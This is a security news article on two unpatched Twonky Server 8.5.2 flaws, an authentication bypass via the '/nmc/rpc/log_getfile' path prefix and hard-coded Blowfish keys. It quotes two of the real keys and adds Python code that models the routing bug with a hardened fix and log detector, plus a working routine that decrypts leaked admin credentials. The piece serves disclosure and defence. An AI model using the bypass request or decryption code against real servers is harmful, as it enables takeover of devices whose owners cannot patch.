Thursday, March 5, 2026

Critical Twonky Server Vulnerabilities Expose Authentication Bypass Path

Twonky Server version 8.5.2 contains two serious flaws that, chained together, let an unauthenticated remote attacker bypass authentication and recover the administrator credentials on Linux and Windows installs.

The issues, tracked as CVE-2025-13315 and CVE-2025-13316, let a remote attacker pull the encrypted admin password out of a log file and decrypt it with keys that are hard-coded into the software.

No patch exists: Lynx Technology told the researchers it could not produce fixes, citing resource constraints, and then stopped responding.

Twonky Server is media software for NAS devices, routers, and set-top boxes that streams audio, video, and photos via DLNA and UPnP.

It ships on embedded devices as a ready-made component that device owners do not customize. Shodan shows roughly 850 instances reachable from the internet, which puts both home and business networks at risk.

Rapid7 researcher Ryan Emmons found these flaws, building on 2021 research by Risk Based Security.

Technical Breakdown

CVE-2025-13315 scores 9.3 (Critical) under CVSS v4.0: it is reachable over the network with no authentication or user interaction, and its impact on confidentiality and availability is high.

Earlier fixes added authentication checks to /rpc paths such as /rpc/get_option?accesspwd, but left gaps in the routing code. In the decompiled binary, logic of the form if (!check_path(&arg1, "/rpc/info_status")) compares the request path against literal /rpc strings, so the same handlers requested under a different prefix are never gated.

Twonky Server Auth Bypass

An attacker requests /nmc/rpc/log_getfile instead of /rpc/log_getfile and receives the log file without logging in. The log records the admin username and the encrypted admin password written at startup.

The file comes back in a single plain HTTP response. This sidesteps the mitigations added for the earlier flaws, and the same prefix trick lets an attacker call the shutdown API without authentication.
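To make the routing gap concrete, here is an added Python model of the bug and of a fix. It is illustrative code written for this article, not Twonky's code and not Rapid7's: it assumes a dispatcher that finds handlers by the "/rpc/<name>" substring while the auth gate compares against literal "/rpc/..." strings, as the decompiled check suggests; the handler table, the /nmc mount, the "shutdown" handler name and the access-log format are assumptions. The hardened variant canonicalises the path once and applies a default-deny gate on that same canonical route, and a small detection function flags prefix-bypass requests in constructed access-log lines.

```python
"""Model of the /rpc authentication-gate bypass described for CVE-2025-13315.

Added illustration, not Twonky's code. The page reports that the gate added
after earlier fixes compares the request path against literal "/rpc/..."
strings (the decompiled check_path(&arg1, "/rpc/info_status") call) while
the same handlers stay reachable under "/nmc/rpc/...". The handler table,
dispatcher and hardened variant below are an assumed reconstruction of that
pattern, not the real routing code.
"""
from urllib.parse import unquote, urlsplit

# Handler names from the page; "shutdown" stands in for the shutdown API the
# page mentions without naming it (assumption).
HANDLERS = {"log_getfile", "get_option", "info_status", "shutdown"}
GATED_LITERALS = {"/rpc/" + n for n in HANDLERS}   # paths the modelled gate knows
MOUNTS = ("/rpc/", "/nmc/rpc/")                   # prefixes served (assumption)
PUBLIC_HANDLERS = set()                           # hardened: default deny

def check_path(path, literal):
    """Exact string compare, as the decompiled check suggests."""
    return path == literal

def vulnerable_handle(raw_path, authenticated):
    """Modelled vulnerable server: 404 unknown, 401 gate fired, 200 handler ran.
    The dispatcher finds the handler by the '/rpc/<name>' substring, so any
    prefix resolves to the same handler; the gate only knows the literal
    '/rpc/<name>' spelling. That mismatch is the bug."""
    path = raw_path.split("?", 1)[0]
    idx = path.find("/rpc/")
    name = path[idx + len("/rpc/"):] if idx >= 0 else None
    if name not in HANDLERS:
        return 404
    if not authenticated and any(check_path(path, lit) for lit in GATED_LITERALS):
        return 401
    return 200

def canonical_route(raw_path):
    """Percent-decode, drop the query and collapse '', '.' and '..' segments so
    that every decision sees one spelling per route."""
    stack = []
    for seg in unquote(urlsplit(raw_path).path).split("/"):
        if seg == "..":
            if stack:
                stack.pop()
        elif seg not in ("", "."):
            stack.append(seg)
    return "/" + "/".join(stack)

def hardened_handle(raw_path, authenticated):
    """Gate and dispatcher share the canonical route; unknown mount points and
    handlers get 404, and every handler needs a session unless allow-listed."""
    route = canonical_route(raw_path)
    name = None
    for mount in MOUNTS:
        if route.startswith(mount):
            name = route[len(mount):]
            break
    if name not in HANDLERS:
        return 404
    if name not in PUBLIC_HANDLERS and not authenticated:
        return 401
    return 200

def flag_bypass_attempts(access_log):
    """Detection over '<client> <path> <status>' lines (constructed format):
    any request reaching an /rpc/ handler under a spelling other than the
    gated literal, e.g. '/nmc/rpc/log_getfile', is flagged."""
    hits = []
    for line in access_log.splitlines():
        parts = line.split()
        if len(parts) >= 2:
            route = canonical_route(parts[1])
            if "/rpc/" in route and route not in GATED_LITERALS:
                hits.append(parts[1])
    return hits

# Constructed log lines for the demo, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 /rpc/log_getfile 401
203.0.113.5 /nmc/rpc/log_getfile 200
203.0.113.5 /rpc/get_option?accesspwd 401
203.0.113.5 /nmc/rpc/get_option?accesspwd 200
198.51.100.7 /index.html 200
"""

if __name__ == "__main__":
    for p in ("/rpc/log_getfile", "/nmc/rpc/log_getfile"):
        print(p, "vulnerable:", vulnerable_handle(p, False),
              "hardened:", hardened_handle(p, False))
    print("bypass attempts:", flag_bypass_attempts(SAMPLE_LOG))
```

The point of the hardened variant is not the list of prefixes but the ordering: decode and normalise first, then make the authorisation decision on the same string the dispatcher uses, with every handler denied unless it is explicitly public. A gate that only recognises one spelling of a route will be bypassed by whatever spelling the dispatcher still accepts.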

CVE-2025-13316 rates 8.2 (High): the Blowfish keys are hard-coded in the binary, so anyone holding the ciphertext can decrypt it trivially.

The binary carries 12 static keys, including "E8ctd4jZwMbaV587" and "jwEkNvuwYCjsDzf5", stored from address 008c7fe0 onward.

On encryption the server seeds the generator with srand, picks a key index as sub_464c10() % 0xc (one of the 12 keys), encrypts the credential with that key, and writes the result to the configuration as ||{HEX_INDEX}{HEX_CIPHERTEXT}.

An attacker reverses the process using the index leaked alongside the ciphertext. A Metasploit module leaks the value "14ee76270058c6e3c9f8cecaaebed4fc5206a1d2066d4f78, 7", decrypts it with key 7 to "admin:R7Password123!!!", and logs in with those credentials.
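As an added worked example (not the Metasploit module and not Twonky's code), the following Python reconstructs the decryption step from the storage format described above. It assumes Blowfish in ECB mode, an index of one or two hex digits, PKCS#7 or NUL padding, and the pycryptodome library; only two of the twelve keys appear on the page, so the remaining entries of the demo key table are constructed placeholders, not values from the binary. It also shows why the leaked index is a convenience rather than a requirement: with a fixed table of twelve keys, trying all of them costs nothing.

```python
"""Recovering the admin password from a leaked Twonky value (CVE-2025-13316).

Added illustration, not the Metasploit module and not Twonky's code. From the
page: the configuration stores ||{HEX_INDEX}{HEX_CIPHERTEXT}, the index picks
one of 12 static Blowfish keys compiled into the binary, and the value and
index leak through the log file. Assumptions made here: the index is one or
two hex digits, Blowfish runs in ECB mode, and the plaintext is padded with
PKCS#7 or NUL bytes. Only two of the twelve real keys appear on the page;
the other ten entries of DEMO_KEYS are constructed placeholders.
"""
import string

try:
    from Crypto.Cipher import Blowfish      # pycryptodome; optional, see decrypt()
except ImportError:
    Blowfish = None

BLOCK = 8                                   # Blowfish block size in bytes

# Two keys quoted on the page plus ten constructed placeholders (NOT the real
# values); in practice read all twelve from the binary at 008c7fe0 onward.
DEMO_KEYS = [b"E8ctd4jZwMbaV587", b"jwEkNvuwYCjsDzf5"] + [
    b"placeholder-key%02d" % i for i in range(2, 12)]


def blowfish_available():
    return Blowfish is not None


def parse_leak(value):
    """Split '||<index><ciphertext>' into (index, ciphertext bytes); also accepts
    the 'ciphertext, index' form the module prints."""
    value = value.strip()
    if "," in value:
        ct_hex, idx_hex = (p.strip() for p in value.split(",", 1))
        return int(idx_hex, 16), bytes.fromhex(ct_hex)
    if value.startswith("||"):
        value = value[2:]
    for width in (1, 2):                    # index width is an assumption
        idx_hex, ct_hex = value[:width], value[width:]
        if ct_hex and len(ct_hex) % (2 * BLOCK) == 0:
            return int(idx_hex, 16), bytes.fromhex(ct_hex)
    raise ValueError("unrecognised encrypted value: %r" % value)


def unpad(data):
    """Strip PKCS#7 if it validates, otherwise trailing NULs (assumption)."""
    n = data[-1] if data else 0
    if 1 <= n <= BLOCK and data.endswith(bytes([n]) * n):
        return data[:-n]
    return data.rstrip(b"\x00")


def looks_like_credential(plain):
    """Plausibility check for a 'user:password' line, used when trying keys."""
    try:
        text = plain.decode("ascii")
    except UnicodeDecodeError:
        return False
    return ":" in text and all(
        c in string.printable and c not in "\t\n\r\x0b\x0c" for c in text)


def decrypt(ciphertext, key):
    if Blowfish is None:
        raise RuntimeError("pycryptodome is not installed (pip install pycryptodome)")
    if len(ciphertext) % BLOCK:
        raise ValueError("ciphertext is not a whole number of Blowfish blocks")
    return unpad(Blowfish.new(key, Blowfish.MODE_ECB).decrypt(ciphertext))


def recover(leaked, keys=DEMO_KEYS):
    """Try the advertised key first, then every other key: with a fixed table
    of twelve the leaked index is a convenience, not a requirement."""
    index, ct = parse_leak(leaked)
    order = [index] if 0 <= index < len(keys) else []
    order += [i for i in range(len(keys)) if i != index]
    for i in order:
        plain = decrypt(ct, keys[i])
        if looks_like_credential(plain):
            return i, plain.decode("ascii")
    return None


def store(plaintext, index, keys=DEMO_KEYS):
    """Inverse of parse_leak + decrypt: builds the ||{HEX_INDEX}{HEX_CIPHERTEXT}
    form (PKCS#7 assumed) so the round trip can be checked offline."""
    if Blowfish is None:
        raise RuntimeError("pycryptodome is not installed (pip install pycryptodome)")
    data = plaintext.encode("ascii")
    pad = BLOCK - len(data) % BLOCK
    data += bytes([pad]) * pad
    cipher = Blowfish.new(keys[index], Blowfish.MODE_ECB)
    return "||%x%s" % (index, cipher.encrypt(data).hex())


if __name__ == "__main__":
    sample = store("admin:R7Password123!!!", 7)   # constructed with a placeholder key
    print(sample)
    print(recover(sample))
```

Run it with pycryptodome installed; store() builds a value under a placeholder key so the round trip can be checked without touching a real server. Against a real leak, replace DEMO_KEYS with the twelve keys read from the binary, and if the output is not a readable user:password string, revisit the mode and padding assumptions before blaming the key table.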

Rapid7 tested the chain on Ubuntu 22.04.1 and Windows Server 2022; together the two flaws give an attacker full administrative control of the server and its media files. Lynx sells a standard and a premium DTCP-IP edition, and both are affected.

CVE | Description | CVSS
CVE-2025-13315 | An unauthenticated remote attacker can bypass web service API authentication controls to leak a log file and read the administrator's username and encrypted password. | 9.3 (Critical)
CVE-2025-13316 | The application uses hardcoded encryption keys across installations. An attacker with an encrypted administrator password value can decrypt it into plain text using these hardcoded keys. | 8.2 (High)

Disclosure began in August 2025 with vendor contact; Lynx cited resource constraints and then went silent despite timeline extensions. Version 8.5.2 remains the current release and is vulnerable.

Until a fix exists, keep Twonky Server off the internet: restrict access to trusted IP ranges with a firewall, and rotate the admin password (and any other account that shares it) if the log endpoint may have been reached. Rotating the password alone is not enough while the endpoint stays exposed, because the new credential is written to the log, encrypted with the same hard-coded keys, at the next startup.

Rapid7's InsightVM already carries checks for both CVEs. Where possible, move to a media server that still receives security updates.

Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.
